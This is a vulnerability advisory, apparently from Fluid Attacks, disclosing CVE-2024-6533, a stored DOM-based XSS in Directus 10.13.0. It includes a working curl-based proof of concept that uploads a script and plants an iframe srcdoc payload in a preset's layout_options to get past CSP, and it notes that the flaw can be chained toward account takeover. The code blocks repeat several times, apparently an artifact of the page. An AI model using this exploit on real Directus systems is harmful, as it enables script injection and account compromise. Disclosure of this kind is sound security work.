

Advisories

Directus 10.13.0 - DOM-based XSS

5.4

Medium

Discovered by

Miguel Gómez

Offensive Team, Fluid Attacks

Summary

Full name

Directus 10.13.0 - DOM-Based cross-site scripting (XSS) via layout_options

Code name

Bocelli

State

Public

Release date

Aug 14, 2024

Affected product

Directus

Affected version(s)

10.13.0

Vulnerability name

DOM-Based cross-site scripting (XSS)

Vulnerability type

371. DOM-Based cross-site scripting (XSS)

Remotely exploitable

Yes

CVSS v3.1 vector string

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CVSS v3.1 base score

5.4

Exploit available

Yes

CVE ID(s)

CVE-2024-6533

Description

Directus v10.13.0 allows an authenticated external attacker to execute arbitrary JavaScript on the client. This is possible because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element. When chained with CVE-2024-6534, it could result in account takeover.

Vulnerability

This vulnerability occurs because the application injects an attacker-controlled parameter that will be stored in the server and used by the client into an unsanitized DOM element.

Exploit

To exploit this vulnerability, we need to do the following steps using a non-administrative, default role attacker account.

Upload the following JavaScript file.

Using the upload functionality at POST /files. This PoC will show an alert message.

export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="malicious@malicious.com"
export ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
    -c "${root_dir}/static/attacker_directus_session_token" \
    -H 'Content-Type: application/json' \
    -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

id_url_file=$(echo "alert('Successful DOM-based XSS')" |
  curl -s -k -X 'POST' "${TARGET_HOST}/files" \
    -b "${root_dir}/static/attacker_directus_session_token" \
    -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")

export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="malicious@malicious.com"
export ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
    -c "${root_dir}/static/attacker_directus_session_token" \
    -H 'Content-Type: application/json' \
    -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

id_url_file=$(echo "alert('Successful DOM-based XSS')" |
  curl -s -k -X 'POST' "${TARGET_HOST}/files" \
    -b "${root_dir}/static/attacker_directus_session_token" \
    -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")

export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="malicious@malicious.com"
export ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
    -c "${root_dir}/static/attacker_directus_session_token" \
    -H 'Content-Type: application/json' \
    -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

id_url_file=$(echo "alert('Successful DOM-based XSS')" |
  curl -s -k -X 'POST' "${TARGET_HOST}/files" \
    -b "${root_dir}/static/attacker_directus_session_token" \
    -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")

export TARGET_HOST="http://localhost:8055"
export ATTACKER_EMAIL="malicious@malicious.com"
export ATTACKER_PASSWORD="123456"
root_dir=$(dirname $0)
mkdir "${root_dir}/static"

curl -s -k -o /dev/null -w "%{http_code}" -X 'POST' "${TARGET_HOST}/auth/login" \
    -c "${root_dir}/static/attacker_directus_session_token" \
    -H 'Content-Type: application/json' \
    -d "{\"email\":\"${ATTACKER_EMAIL}\",\"password\":\"${ATTACKER_PASSWORD}\",\"mode\":\"session\"}"

id_url_file=$(echo "alert('Successful DOM-based XSS')" |
  curl -s -k -X 'POST' "${TARGET_HOST}/files" \
    -b "${root_dir}/static/attacker_directus_session_token" \
    -F "file=@-;type=application/x-javascript;filename=poc.js" | jq -r ".data.id")

Create a preset for a collection and store the preset ID.

Or use a preset already created from GET /presets. The following example uses the direct_users preset.

attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
 -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \
 -H 'Content-Type: application/json' \
 -b "${root_dir}/static/attacker_directus_session_token" \
 --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
 -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \
 -H 'Content-Type: application/json' \
 -b "${root_dir}/static/attacker_directus_session_token" \
 --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
 -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \
 -H 'Content-Type: application/json' \
 -b "${root_dir}/static/attacker_directus_session_token" \
 --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

attacker_user_id=$(curl -s -k "${TARGET_HOST}/users/me" \
 -b "${root_dir}/static/attacker_directus_session_token" | jq -r ".data.id")

curl -i -s -k -X 'POST' "${TARGET_HOST}/presets" \
 -H 'Content-Type: application/json' \
 -b "${root_dir}/static/attacker_directus_session_token" \
 --data-binary "{\"layout\":\"cards\",\"bookmark\":null,\"role\":null,\"user\":\"${attacker_user_id}\",\"search\":null,\"filter\":null,\"layout_query\":{\"cards\":{\"sort\":[\"email\"]}},\"layout_options\":{\"cards\":{\"icon\":\"account_circle\",\"title\":\"<iframe srcdoc=\\\"<script src='http://localhost:8055/assets/${id_url_file}'> </script>\\\">\",\"subtitle\":\"{{ email }}\",\"size\":4}},\"refresh_interval\":null,\"icon\":\"bookmark\",\"color\":null,\"collection\":\"directus_users\"}"

When the user visits the view that uses the directus_users preset, the JavaScript file will be executed.

Notes:

Need to use an iframe to execute the malicious JavaScript file to bypass the CSP policies. The payload structure is <iframe srcdoc=\"<script src='URL_MALICIOUS_FILE'> </script>\">.

We can target any collection that uses the vulnerable template structure that renders the layout option section.

In this PoC, the target is the same user who sends the payload, but if the attacking user has permission to modify or create presets for other users or even if he does not have permissions but can chain with CVE-2024-6534, he can achieve an account takeover.

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2024-6533 to refer to this issue from now on.

Disclosure policy

System Information

Version: Directus 10.13.0
Operating System: Any

Mitigation

There is currently no patch available for this vulnerability.

References

Vendor page https://directus.io/

Credits

The vulnerability was discovered by Miguel Gomez from Fluid Attacks' Offensive Team.

Timeline



Jul 4, 2024

Vulnerability discovered



Jul 15, 2024

Vendor contacted



Jul 16, 2024

Vendor replied



Aug 14, 2024

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

Get an AI summary of Fluid Attacks